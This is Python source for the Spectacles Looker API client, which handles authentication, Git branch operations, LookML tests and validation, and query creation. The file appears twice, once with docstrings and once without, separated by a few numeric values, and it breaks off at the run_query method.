"please commit or revert them, then try again."
),
response=response,
)
def reset_to_remote(self, project: str) -> None:
"""Reset a project development branch to the revision of the project that is on the remote.
Args:
project: Name of the Looker project to use.
"""
logger.debug("Resetting branch to remote.")
url = utils.compose_url(
self.api_url, path=["projects", project, "reset_to_remote"]
)
response = self.post(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-reset-remote",
title="Couldn't checkout Git branch.",
status=response.status_code,
detail=(
"Unable to reset local Git branch "
"to match remote. Please try again."
),
response=response,
)
def get_manifest(self, project: str) -> JsonDict:
"""Gets all the dependent LookML projects defined in the manifest file.
Args:
project: Name of the Looker project to use.
Returns:
List[JsonDict]: JSON response containing all dependent projects
"""
logger.debug("Getting manifest details")
url = utils.compose_url(self.api_url, path=["projects", project, "manifest"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-manifest",
title="Couldn't retrieve project manifest.",
status=response.status_code,
detail=(
f"Failed to retrieve manifest for project '{project}'. "
"Make sure you have a 'manifest.lkml' file in your project, "
"then try again."
),
response=response,
)
manifest = response.json()
return manifest
def get_active_branch(self, project: str) -> JsonDict:
"""Gets the active branch for the user in the given project.
Args:
project: Name of the Looker project to use.
Returns:
str: Name of the active branch
"""
logger.debug(f"Getting active branch for project '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-active-branch",
title="Couldn't determine active Git branch.",
status=response.status_code,
detail=(
f"Unable to get active branch for project '{project}'. "
"Please check that the project exists and that your user "
"has the correct permissions and try again."
),
response=response,
)
branch_name = response.json()["name"]
logger.debug(f"The active branch is '{branch_name}'")
return response.json()
def get_active_branch_name(self, project: str) -> str:
"""Helper method to return only the branch name."""
full_response = self.get_active_branch(project)
return full_response["name"]
def create_branch(self, project: str, branch: str, ref: Optional[str] = None):
"""Creates a branch in the given project.
Args:
project: Name of the Looker project to use.
branch: Name of the branch to create.
ref: The ref to create the branch from.
"""
body = {"name": branch}
message = f"Creating branch '{branch}' on project '{project}'"
detail = (
f"Unable to create branch '{branch}' "
f"in project '{project}'. "
"Confirm the branch doesn't already exist and try again."
)
if ref:
body["ref"] = ref
message += f" with ref '{ref}'"
detail = (
f"Unable to create branch '{branch}' "
f"in project '{project}' using ref '{ref}'. "
"Confirm the branch doesn't already exist and try again."
)
logger.debug(message)
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.post(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-create-branch",
title="Couldn't create new Git branch.",
status=response.status_code,
detail=detail,
response=response,
)
def hard_reset_branch(self, project: str, branch: str, ref: str):
"""Hard resets a branch to the ref prodvided.
DANGER: hard reset will be force pushed to the remote. Unsaved changes and
commits may be permanently lost.
Args:
project: Name of the Looker project to use.
branch: Name of the branch to update.
ref: The ref to update the branch from.
"""
logger.debug(
f"Hard resetting branch '{branch}' on project '{project}' to ref '{ref}'"
)
body = {"name": branch, "ref": ref}
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.put(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-update-branch",
title="Couldn't update Git branch.",
status=response.status_code,
detail=(
f"Unable to update branch '{branch}' "
f"in project '{project}' using ref '{ref}'. "
"Please try again."
),
response=response,
)
def delete_branch(self, project: str, branch: str):
"""Deletes a branch in the given project.
Args:
project: Name of the Looker project to use.
branch: Name of the branch to delete.
"""
logger.debug(f"Deleting branch '{branch}' in project '{project}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "git_branch", branch]
)
response = self.delete(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-delete-branch",
title="Couldn't delete Git branch.",
status=response.status_code,
detail=(
f"Unable to delete branch '{branch}' "
f"in project '{project}'. Please try again."
),
response=response,
)
def all_lookml_tests(self, project: str) -> List[JsonDict]:
"""Gets all LookML/data tests for a given project.
Args:
project: Name of the Looker project to use
Returns:
List[JsonDict]: JSON response containing all LookML/data tests
"""
logger.debug(f"Getting LookML tests for project {project}")
url = utils.compose_url(
self.api_url, path=["projects", project, "lookml_tests"]
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-data-tests",
title="Couldn't retrieve all data tests.",
status=response.status_code,
detail=(
f"Unable to retrieve all data tests for "
f"project '{project}'. Please try again."
),
response=response,
)
return response.json()
def run_lookml_test(
self, project: str, model: str = None, test: str = None
) -> List[JsonDict]:
"""Runs all LookML/data tests for a given project and model (optional)
This command only runs tests in production, as the Looker API doesn't currently
allow us to run data tests on a specific branch.
Args:
project: Name of the Looker project to use
model: Optional name of the LookML model to restrict testing to
Returns:
List[JsonDict]: JSON response containing any LookML/data test errors
"""
if model is None and test is None:
logger.debug(f"Running all LookML tests for project '{project}'")
elif model is None and test is not None:
logger.debug(f"Running LookML test '{test}'")
elif model is not None and test is None:
logger.debug(f"Running all LookML tests for model '{model}'")
elif model is not None and test is not None:
logger.debug(f"Running LookML test '{test}' in model '{model}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "lookml_tests", "run"]
)
params = {}
if model is not None:
params["model"] = model
if test is not None:
params["test"] = test
response = self.session.get(url=url, params=params, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-run-data-test",
title="Couldn't run data test.",
status=response.status_code,
detail=(
f"Unable to run one or more data tests for "
f"project '{project}'. Please try again."
),
response=response,
)
return response.json()
def get_lookml_models(self, fields: Optional[List] = None) -> List[JsonDict]:
"""Gets all models and explores from the LookmlModel endpoint.
Returns:
List[JsonDict]: JSON response containing LookML models and explores.
"""
logger.debug(f"Getting all models and explores from {self.base_url}")
if fields is None:
fields = []
params = {}
if fields:
params["fields"] = fields
url = utils.compose_url(self.api_url, path=["lookml_models"], params=params)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-lookml",
title="Couldn't retrieve models and explores.",
status=response.status_code,
detail="Unable to retrieve LookML details. Please try again.",
response=response,
)
return response.json()
def get_lookml_dimensions(self, model: str, explore: str) -> List[str]:
"""Gets all dimensions for an explore from the LookmlModel endpoint.
Args:
model: Name of LookML model to query.
explore: Name of LookML explore to query.
Returns:
List[str]: Names of all the dimensions in the specified explore. Dimension
names are returned in the format 'explore_name.dimension_name'.
"""
logger.debug(f"Getting all dimensions from explore {model}/{explore}")
params = {"fields": ["fields"]}
url = utils.compose_url(
self.api_url,
path=["lookml_models", model, "explores", explore],
params=params,
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-dimension-lookml",
title="Couldn't retrieve dimensions.",
status=response.status_code,
detail=(
"Unable to retrieve dimension LookML details "
f"for explore '{model}/{explore}'. Please try again."
),
response=response,
)
return response.json()["fields"]["dimensions"]
def create_query(
self, model: str, explore: str, dimensions: List[str], fields: List = None
) -> Dict:
"""Creates a Looker async query for one or more specified dimensions.
The query created is a SELECT query, selecting all dimensions specified for a
certain model and explore. Looker builds the query using the `sql` field in the
LookML for each dimension.
If a Timeout exception is received, attempts to retry.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug(
"Creating async query for %s/%s/%s",
model,
explore,
"*" if len(dimensions) != 1 else dimensions[0],
)
body = {
"model": model,
"view": explore,
"fields": dimensions,
"limit": 0,
"filter_expression": "1=2",
}
params: Dict[str, list] = {}
if fields is None:
params["fields"] = []
else:
params["fields"] = fields
url = utils.compose_url(self.api_url, path=["queries"], params=params)
response = self.post(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-create-query",
title="Couldn't create query.",
status=response.status_code,
detail=(
f"Failed to create query for {model}/{explore}/"
f'{"*" if len(dimensions) > 1 else dimensions[0]}. '
"Please try again."
),
response=response,
)
result = response.json()
query_id = result["id"]
logger.debug(
"Query for %s/%s/%s created as query %d",
model,
explore,
"*" if len(dimensions) != 1 else dimensions[0],
query_id,
)
return result
def create_query_task(self, query_id: int) -> str:
"""Runs a previously created query asynchronously and returns the query task ID.
If a ClientError or TimeoutError is received, attempts to retry.
Args:
session: Existing asychronous HTTP session.
query_id: ID of a previously created query to run.
Returns:
str: ID for the query task, used to check on the status of the query, which
is being run asynchronously.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug("Starting query %d", query_id)
body = {"query_id": query_id, "result_format": "json_detail"}
params = {"fields": ["id"]}
url = utils.compose_url(self.api_url, path=["query_tasks"], params=params)
response = self.post(
url=url, json=body, params={"cache": "false"}, timeout=TIMEOUT_SEC
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-launch-query",
title="Couldn't launch query.",
status=response.status_code,
detail=(
"Failed to create query task for "
f"query '{query_id}'. Please try again."
),
response=response,
)
result = response.json()
query_task_id = result["id"]
logger.debug("Query %d is running under query task %s", query_id, query_task_id)
return query_task_id
def get_query_task_multi_results(self, query_task_ids: List[str]) -> JsonDict:
"""Returns query task results.
If a ClientError or TimeoutError is received, attempts to retry.
Args:
query_task_ids: IDs for the query tasks running asynchronously.
Returns:
List[JsonDict]: JSON response from the query task.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug(
"Attempting to get results for %d query tasks", len(query_task_ids)
)
url = utils.compose_url(self.api_url, path=["query_tasks", "multi_results"])
response = self.get(
url=url,
params={"query_task_ids": ",".join(query_task_ids)},
timeout=TIMEOUT_SEC,
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-query-results",
title="Couldn't get results for the specified query tasks.",
status=response.status_code,
detail=(
"Failed to get the results for "
f"{len(query_task_ids)} query tasks. "
"Please try again."
),
response=response,
)
result = response.json()
return result
def cancel_query_task(self, query_task_id: str):
"""Cancels a query task.
Args:
query_task_id: ID for the query task to cancel.
"""
logger.debug(f"Cancelling query task: {query_task_id}")
url = utils.compose_url(self.api_url, path=["running_queries", query_task_id])
self.delete(url=url, timeout=TIMEOUT_SEC)
# No raise_for_status() here because Looker API seems to give a 404
# if you try to cancel a finished query which can happen as part of cleanup
def content_validation(self) -> JsonDict:
logger.debug("Validating all content in Looker")
url = utils.compose_url(self.api_url, path=["content_validation"])
response = self.get(
url=url, timeout=3600
) # 1 hour timeout for content validation
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-validate-content",
title="Couldn't validate Looks and Dashboards.",
status=response.status_code,
detail=("Failed to run the content validator. Please try again."),
response=response,
)
result = response.json()
return result
def lookml_validation(self, project) -> JsonDict:
logger.debug(f"Validating LookML for project '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "validate"])
response = self.post(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-validate-lookml",
title=f"Couldn't validate LookML in project {project}.",
status=response.status_code,
detail=("Failed to run the LookML validator. Please try again."),
response=response,
)
result = response.json()
return result
def cached_lookml_validation(self, project) -> Optional[JsonDict]:
logger.debug(f"Getting cached LookML validation results for '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "validate"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-cached-lookml-validation",
title=f"Couldn't get cached LookML validation results in project '{project}'.",
status=response.status_code,
detail=(
"Failed to get cached LookML valiation results. Please try again."
),
response=response,
)
# If no cached validation results are available, Looker returns a 204 No Content.
# The response has no payload. We should return None in this case and handle accordingly.
if response.status_code == 204:
return None
result = response.json()
return result
def all_folders(self) -> List[JsonDict]:
logger.debug("Getting information about all folders")
url = utils.compose_url(self.api_url, path=["folders"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-folders",
title="Couldn't obtain project folders.",
status=response.status_code,
detail=("Failed to get all folders."),
response=response,
)
result = response.json()
return result
@backoff.on_exception(backoff.expo, (Timeout,), max_tries=2)
def run_query(self, query_id: int) -> str:
"""Returns the compiled SQL for a given query ID.
The corresponding Looker API endpoint allows us to run queries with a variety
of result formats, however we only use the `sql` result format, which doesn't
run the query but does return its compiled SQL.
If a Timeout exception is received, attempts to retry.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug("Retrieving the SQL for query ID %s", query_id)
url = utils.compose_url(self.api_url, path=["queries", query_id, "run", "sql"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError as e:
if e.response.status_code == 404:
return (
"-- SQL could not be generated because of errors with this query."
)
else:
raise LookerApiError(
name="unable-to-retrieve-compiled-sql",
title="Couldn't retrieve compiled SQL.",
status=response.status_code,
detail=(
f"Failed to retrieve compiled SQL for query '{query_id}'. "
"Please try again."
),
response=response,
)
result = response.text
return result
class NullAuth(requests.auth.AuthBase):
"""A custom auth class which ensures requests does not override authorization
headers with netrc file credentials if present.
"""
def __call__(self, r):
return r
| 37.264957
| 99
| 0.571072
|
from typing import List, Dict, Optional
import time
from dataclasses import dataclass
import backoff
import requests
from requests.exceptions import Timeout, HTTPError, ConnectionError
import spectacles.utils as utils
from spectacles.types import JsonDict
from spectacles.logger import GLOBAL_LOGGER as logger
from spectacles.exceptions import SpectaclesException, LookerApiError
TIMEOUT_SEC = 300
BACKOFF_EXCEPTIONS = (Timeout, HTTPError, ConnectionError)
@dataclass(frozen=True)
class AccessToken:
access_token: str
token_type: str
expires_in: int
expires_at: float
def __str__(self) -> str:
return self.access_token
@property
def expired(self) -> bool:
return False if time.time() < self.expires_at else True
class LookerClient:
def __init__(
self,
base_url: str,
client_id: str,
client_secret: str,
port: Optional[int] = None,
api_version: float = 3.1,
):
supported_api_versions = [3.1]
if api_version not in supported_api_versions:
raise SpectaclesException(
name="unsupported-api-version",
title="Specified API version is not supported.",
detail=(
f"Version '{api_version}' is not supported. "
"Please use one of these supported versions instead: "
f"{', '.join(str(ver) for ver in sorted(supported_api_versions))}"
),
)
self.base_url: str = base_url.rstrip("/")
if port is None and self.base_url.endswith("cloud.looker.com"):
if not self.base_url.startswith("https"):
raise SpectaclesException(
name="invalid-base-url",
title="Looker instance base URL is not valid.",
detail="The URL must be an HTTPS URL.",
)
self.api_url: str = f"{self.base_url}/api/{api_version}/"
else:
self.api_url = f"{self.base_url}:{port or 19999}/api/{api_version}/"
self.client_id: str = client_id
self.client_secret: str = client_secret
self.api_version: float = api_version
self.access_token: Optional[AccessToken] = None
self.session: requests.Session = requests.Session()
self.workspace: str = "production"
self.authenticate()
def authenticate(self) -> None:
logger.debug(f"Authenticating to the Looker as client ID '{self.client_id}'")
url = utils.compose_url(self.api_url, path=["login"])
body = {"client_id": self.client_id, "client_secret": self.client_secret}
self.session.auth = NullAuth()
response = self.session.post(url=url, data=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-authenticate",
title="Couldn't authenticate to the Looker API.",
status=response.status_code,
detail=(
f"Unable to authenticate with client ID '{self.client_id}'. "
"Check that your credentials are correct and try again."
),
response=response,
)
result = response.json()
if "expires_at" not in result:
# Calculate the expiration time with a one-minute buffer
result["expires_at"] = time.time() + result["expires_in"] - 60
self.access_token = AccessToken(**result)
self.session.headers = { # type: ignore
"Authorization": f"token {self.access_token}"
}
looker_version = self.get_looker_release_version()
logger.info(
f"Connected to Looker version {looker_version} "
f"using Looker API {self.api_version}"
)
@backoff.on_exception(
backoff.expo,
BACKOFF_EXCEPTIONS,
max_tries=2,
)
def request(self, method: str, url: str, *args, **kwargs) -> requests.Response:
if self.access_token and self.access_token.expired:
logger.debug("Looker API access token has expired, requesting a new one")
self.authenticate()
if self.workspace == "dev":
self.update_workspace("dev")
return self.session.request(method, url, *args, **kwargs)
def get(self, url, *args, **kwargs) -> requests.Response:
return self.request("GET", url, *args, **kwargs)
def post(self, url, *args, **kwargs) -> requests.Response:
return self.request("POST", url, *args, **kwargs)
def patch(self, url, *args, **kwargs) -> requests.Response:
return self.request("PATCH", url, *args, **kwargs)
def put(self, url, *args, **kwargs) -> requests.Response:
return self.request("PUT", url, *args, **kwargs)
def delete(self, url, *args, **kwargs) -> requests.Response:
return self.request("DELETE", url, *args, **kwargs)
def get_looker_release_version(self) -> str:
logger.debug("Checking Looker instance release version")
url = utils.compose_url(self.api_url, path=["versions"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-version",
title="Couldn't get Looker's release version.",
status=response.status_code,
detail=(
"Unable to get the release version of your Looker instance. "
"Please try again."
),
response=response,
)
return response.json()["looker_release_version"]
def get_workspace(self) -> str:
logger.debug("Getting the workspace in use by this session")
url = utils.compose_url(self.api_url, path=["session"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-workspace",
title="Couldn't get the workspace.",
status=response.status_code,
detail=(
"Unable to get the workspace in use by this session. "
"Please try again."
),
response=response,
)
return response.json()["workspace_id"]
def update_workspace(self, workspace: str) -> None:
logger.debug(f"Updating session to use the {workspace} workspace")
url = utils.compose_url(self.api_url, path=["session"])
body = {"workspace_id": workspace}
response = self.patch(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-update-workspace",
title="Couldn't update the session's workspace.",
status=response.status_code,
detail=(
f"Unable to update workspace to '{workspace}'. "
"If you have any unsaved work on the branch "
"checked out by the user whose API credentials "
"Spectacles is using, please save it and try again."
),
response=response,
)
self.workspace = workspace
def get_all_branches(self, project: str) -> List[str]:
logger.debug(f"Getting all Git branches in project '{project}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "git_branches"]
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-branches",
title="Couldn't get all Git branches.",
status=response.status_code,
detail=(
f"Unable to get all Git branches in project '{project}'. "
"Please try again."
),
response=response,
)
return [branch["name"] for branch in response.json()]
def checkout_branch(self, project: str, branch: str) -> None:
logger.debug(f"Setting project '{project}' branch to '{branch}'")
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
body = {"name": branch}
response = self.put(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-checkout-branch",
title="Couldn't checkout Git branch.",
status=response.status_code,
detail=(
f"Unable to checkout Git branch '{branch}'. "
"If you have uncommitted changes on the current branch, "
"please commit or revert them, then try again."
),
response=response,
)
def reset_to_remote(self, project: str) -> None:
logger.debug("Resetting branch to remote.")
url = utils.compose_url(
self.api_url, path=["projects", project, "reset_to_remote"]
)
response = self.post(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-reset-remote",
title="Couldn't checkout Git branch.",
status=response.status_code,
detail=(
"Unable to reset local Git branch "
"to match remote. Please try again."
),
response=response,
)
def get_manifest(self, project: str) -> JsonDict:
logger.debug("Getting manifest details")
url = utils.compose_url(self.api_url, path=["projects", project, "manifest"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-manifest",
title="Couldn't retrieve project manifest.",
status=response.status_code,
detail=(
f"Failed to retrieve manifest for project '{project}'. "
"Make sure you have a 'manifest.lkml' file in your project, "
"then try again."
),
response=response,
)
manifest = response.json()
return manifest
def get_active_branch(self, project: str) -> JsonDict:
logger.debug(f"Getting active branch for project '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-active-branch",
title="Couldn't determine active Git branch.",
status=response.status_code,
detail=(
f"Unable to get active branch for project '{project}'. "
"Please check that the project exists and that your user "
"has the correct permissions and try again."
),
response=response,
)
branch_name = response.json()["name"]
logger.debug(f"The active branch is '{branch_name}'")
return response.json()
def get_active_branch_name(self, project: str) -> str:
full_response = self.get_active_branch(project)
return full_response["name"]
def create_branch(self, project: str, branch: str, ref: Optional[str] = None):
body = {"name": branch}
message = f"Creating branch '{branch}' on project '{project}'"
detail = (
f"Unable to create branch '{branch}' "
f"in project '{project}'. "
"Confirm the branch doesn't already exist and try again."
)
if ref:
body["ref"] = ref
message += f" with ref '{ref}'"
detail = (
f"Unable to create branch '{branch}' "
f"in project '{project}' using ref '{ref}'. "
"Confirm the branch doesn't already exist and try again."
)
logger.debug(message)
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.post(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-create-branch",
title="Couldn't create new Git branch.",
status=response.status_code,
detail=detail,
response=response,
)
def hard_reset_branch(self, project: str, branch: str, ref: str):
logger.debug(
f"Hard resetting branch '{branch}' on project '{project}' to ref '{ref}'"
)
body = {"name": branch, "ref": ref}
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.put(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-update-branch",
title="Couldn't update Git branch.",
status=response.status_code,
detail=(
f"Unable to update branch '{branch}' "
f"in project '{project}' using ref '{ref}'. "
"Please try again."
),
response=response,
)
def delete_branch(self, project: str, branch: str):
logger.debug(f"Deleting branch '{branch}' in project '{project}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "git_branch", branch]
)
response = self.delete(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-delete-branch",
title="Couldn't delete Git branch.",
status=response.status_code,
detail=(
f"Unable to delete branch '{branch}' "
f"in project '{project}'. Please try again."
),
response=response,
)
def all_lookml_tests(self, project: str) -> List[JsonDict]:
logger.debug(f"Getting LookML tests for project {project}")
url = utils.compose_url(
self.api_url, path=["projects", project, "lookml_tests"]
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-data-tests",
title="Couldn't retrieve all data tests.",
status=response.status_code,
detail=(
f"Unable to retrieve all data tests for "
f"project '{project}'. Please try again."
),
response=response,
)
return response.json()
def run_lookml_test(
self, project: str, model: str = None, test: str = None
) -> List[JsonDict]:
if model is None and test is None:
logger.debug(f"Running all LookML tests for project '{project}'")
elif model is None and test is not None:
logger.debug(f"Running LookML test '{test}'")
elif model is not None and test is None:
logger.debug(f"Running all LookML tests for model '{model}'")
elif model is not None and test is not None:
logger.debug(f"Running LookML test '{test}' in model '{model}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "lookml_tests", "run"]
)
params = {}
if model is not None:
params["model"] = model
if test is not None:
params["test"] = test
response = self.session.get(url=url, params=params, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-run-data-test",
title="Couldn't run data test.",
status=response.status_code,
detail=(
f"Unable to run one or more data tests for "
f"project '{project}'. Please try again."
),
response=response,
)
return response.json()
def get_lookml_models(self, fields: Optional[List] = None) -> List[JsonDict]:
logger.debug(f"Getting all models and explores from {self.base_url}")
if fields is None:
fields = []
params = {}
if fields:
params["fields"] = fields
url = utils.compose_url(self.api_url, path=["lookml_models"], params=params)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-lookml",
title="Couldn't retrieve models and explores.",
status=response.status_code,
detail="Unable to retrieve LookML details. Please try again.",
response=response,
)
return response.json()
def get_lookml_dimensions(self, model: str, explore: str) -> List[str]:
logger.debug(f"Getting all dimensions from explore {model}/{explore}")
params = {"fields": ["fields"]}
url = utils.compose_url(
self.api_url,
path=["lookml_models", model, "explores", explore],
params=params,
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-dimension-lookml",
title="Couldn't retrieve dimensions.",
status=response.status_code,
detail=(
"Unable to retrieve dimension LookML details "
f"for explore '{model}/{explore}'. Please try again."
),
response=response,
)
return response.json()["fields"]["dimensions"]
def create_query(
self, model: str, explore: str, dimensions: List[str], fields: List = None
) -> Dict:
logger.debug(
"Creating async query for %s/%s/%s",
model,
explore,
"*" if len(dimensions) != 1 else dimensions[0],
)
body = {
"model": model,
"view": explore,
"fields": dimensions,
"limit": 0,
"filter_expression": "1=2",
}
params: Dict[str, list] = {}
if fields is None:
params["fields"] = []
else:
params["fields"] = fields
url = utils.compose_url(self.api_url, path=["queries"], params=params)
response = self.post(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-create-query",
title="Couldn't create query.",
status=response.status_code,
detail=(
f"Failed to create query for {model}/{explore}/"
f'{"*" if len(dimensions) > 1 else dimensions[0]}. '
"Please try again."
),
response=response,
)
result = response.json()
query_id = result["id"]
logger.debug(
"Query for %s/%s/%s created as query %d",
model,
explore,
"*" if len(dimensions) != 1 else dimensions[0],
query_id,
)
return result
def create_query_task(self, query_id: int) -> str:
# Using old-style string formatting so that strings are formatted lazily
logger.debug("Starting query %d", query_id)
body = {"query_id": query_id, "result_format": "json_detail"}
params = {"fields": ["id"]}
url = utils.compose_url(self.api_url, path=["query_tasks"], params=params)
response = self.post(
url=url, json=body, params={"cache": "false"}, timeout=TIMEOUT_SEC
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-launch-query",
title="Couldn't launch query.",
status=response.status_code,
detail=(
"Failed to create query task for "
f"query '{query_id}'. Please try again."
),
response=response,
)
result = response.json()
query_task_id = result["id"]
logger.debug("Query %d is running under query task %s", query_id, query_task_id)
return query_task_id
def get_query_task_multi_results(self, query_task_ids: List[str]) -> JsonDict:
logger.debug(
"Attempting to get results for %d query tasks", len(query_task_ids)
)
url = utils.compose_url(self.api_url, path=["query_tasks", "multi_results"])
response = self.get(
url=url,
params={"query_task_ids": ",".join(query_task_ids)},
timeout=TIMEOUT_SEC,
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-query-results",
title="Couldn't get results for the specified query tasks.",
status=response.status_code,
detail=(
"Failed to get the results for "
f"{len(query_task_ids)} query tasks. "
"Please try again."
),
response=response,
)
result = response.json()
return result
def cancel_query_task(self, query_task_id: str):
logger.debug(f"Cancelling query task: {query_task_id}")
url = utils.compose_url(self.api_url, path=["running_queries", query_task_id])
self.delete(url=url, timeout=TIMEOUT_SEC)
# No raise_for_status() here because Looker API seems to give a 404
# if you try to cancel a finished query which can happen as part of cleanup
def content_validation(self) -> JsonDict:
logger.debug("Validating all content in Looker")
url = utils.compose_url(self.api_url, path=["content_validation"])
response = self.get(
url=url, timeout=3600
) # 1 hour timeout for content validation
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-validate-content",
title="Couldn't validate Looks and Dashboards.",
status=response.status_code,
detail=("Failed to run the content validator. Please try again."),
response=response,
)
result = response.json()
return result
def lookml_validation(self, project) -> JsonDict:
logger.debug(f"Validating LookML for project '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "validate"])
response = self.post(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-validate-lookml",
title=f"Couldn't validate LookML in project {project}.",
status=response.status_code,
detail=("Failed to run the LookML validator. Please try again."),
response=response,
)
result = response.json()
return result
def cached_lookml_validation(self, project) -> Optional[JsonDict]:
logger.debug(f"Getting cached LookML validation results for '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "validate"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-cached-lookml-validation",
title=f"Couldn't get cached LookML validation results in project '{project}'.",
status=response.status_code,
detail=(
"Failed to get cached LookML valiation results. Please try again."
),
response=response,
)
if response.status_code == 204:
return None
result = response.json()
return result
def all_folders(self) -> List[JsonDict]:
logger.debug("Getting information about all folders")
url = utils.compose_url(self.api_url, path=["folders"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-folders",
title="Couldn't obtain project folders.",
status=response.status_code,
detail=("Failed to get all folders."),
response=response,
)
result = response.json()
return result
@backoff.on_exception(backoff.expo, (Timeout,), max_tries=2)
def run_query(self, query_id: int) -> str:
